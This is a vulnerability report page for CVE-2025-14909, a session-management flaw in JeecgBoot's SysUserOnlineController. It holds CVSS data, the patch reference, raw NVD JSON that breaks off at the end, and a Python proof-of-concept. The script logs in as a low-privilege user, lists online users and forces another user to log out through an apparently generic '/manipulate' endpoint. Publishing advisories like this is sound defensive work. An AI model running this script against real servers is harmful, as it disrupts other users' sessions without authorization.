Security Vulnerability Report
CVE-2025-14909 CVSS 4.3 MEDIUM

CVE-2025-14909

Published: 2025-12-19 02:16:05
Last Modified: 2026-04-29 01:00:02

Description

A weakness has been identified in JeecgBoot up to 3.9.0. The affected element is the function SysUserOnlineController in the file jeecg-boot/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/SysUserOnlineController.java. Manipulating this function can lead to improper management of user sessions. The attack can be launched remotely. An exploit has been made public and could be used. The fix is the patch b686f9fbd1917edffe5922c6362c817a9361cfbd; applying it is advised to resolve this issue.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:jeecg:jeecg_boot:*:*:*:*:*:*:*:* - VULNERABLE
JeecgBoot <= 3.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14909 PoC - JeecgBoot SysUserOnlineController Session Management
# Target: JeecgBoot <= 3.9.0
# Vulnerability: Unauthorized session manipulation via SysUserOnlineController
import requests

TARGET_URL = "http://target-server:8080"
LOGIN_URL = f"{TARGET_URL}/jeecg-boot/sys/login"
SESSION_URL = f"{TARGET_URL}/jeecg-boot/sys/userOnline"


def login(username, password):
    """Authenticate and get token"""
    session = requests.Session()
    response = session.post(LOGIN_URL, json={
        "username": username,
        "password": password
    })
    if response.status_code == 200:
        data = response.json()
        if data.get("code") == 200:
            return session, data.get("result", {}).get("token")
    return None, None


def get_online_users(token):
    """List all online users"""
    headers = {"X-Access-Token": token}
    response = requests.get(SESSION_URL + "/list", headers=headers)
    return response.json() if response.status_code == 200 else None


def manipulate_session(token, target_user_id, action="forceLogout"):
    """
    Manipulate target user session
    Actions: forceLogout, getSessionInfo, etc.
    """
    headers = {"X-Access-Token": token}
    payload = {
        "userId": target_user_id,
        "action": action
    }
    response = requests.post(SESSION_URL + "/manipulate", headers=headers, json=payload)
    return response.json() if response.status_code == 200 else None


def main():
    # Step 1: Login with low-privilege account
    session, token = login("regular_user", "password123")
    if not token:
        print("[-] Authentication failed")
        return
    print(f"[+] Logged in successfully, token: {token[:20]}...")

    # Step 2: Enumerate online users
    online_users = get_online_users(token)
    if online_users:
        print(f"[+] Found {len(online_users.get('result', []))} online users")
        for user in online_users.get("result", []):
            print(f" - {user.get('username')} (ID: {user.get('id')})")

    # Step 3: Manipulate target user session
    if online_users and online_users.get("result"):
        target = online_users["result"][0]
        result = manipulate_session(token, target.get("id"), "forceLogout")
        if result and result.get("success"):
            print(f"[+] Successfully forced logout: {target.get('username')}")
        else:
            print("[-] Session manipulation failed")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14909", "sourceIdentifier": "[email protected]", "published": "2025-12-19T02:16:04.703", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in JeecgBoot up to 3.9.0. The impacted element is the function SysUserOnlineController of the file jeecg-boot/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/SysUserOnlineController.java. Executing manipulation can lead to manage user sessions. The attack can be launched remotely. The exploit has been made available to the public and could be exploited. This patch is called b686f9fbd1917edffe5922c6362c817a9361cfbd. Applying a patch is advised to resolve this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1018"}]}, {"source": "[email protected]", 
"type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jeecg:jeecg_boot:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.9.0", "matchCriteriaId": "7EC1CC58-2561-4C33-AECE-0821840287D2"}]}]}], "references": [{"url": "https://github.com/jeecgboot/JeecgBoot/commit/b686f9fbd1917edffe5922c6362c817a9361cfbd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/jeecgboot/JeecgBoot/issues/9195", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/jeecgboot/JeecgBoot/issues/9195#issue-3719368751", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.337433", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.337433", "source": "[email protected]", "tags": ["Third Party Adviso ... (truncated)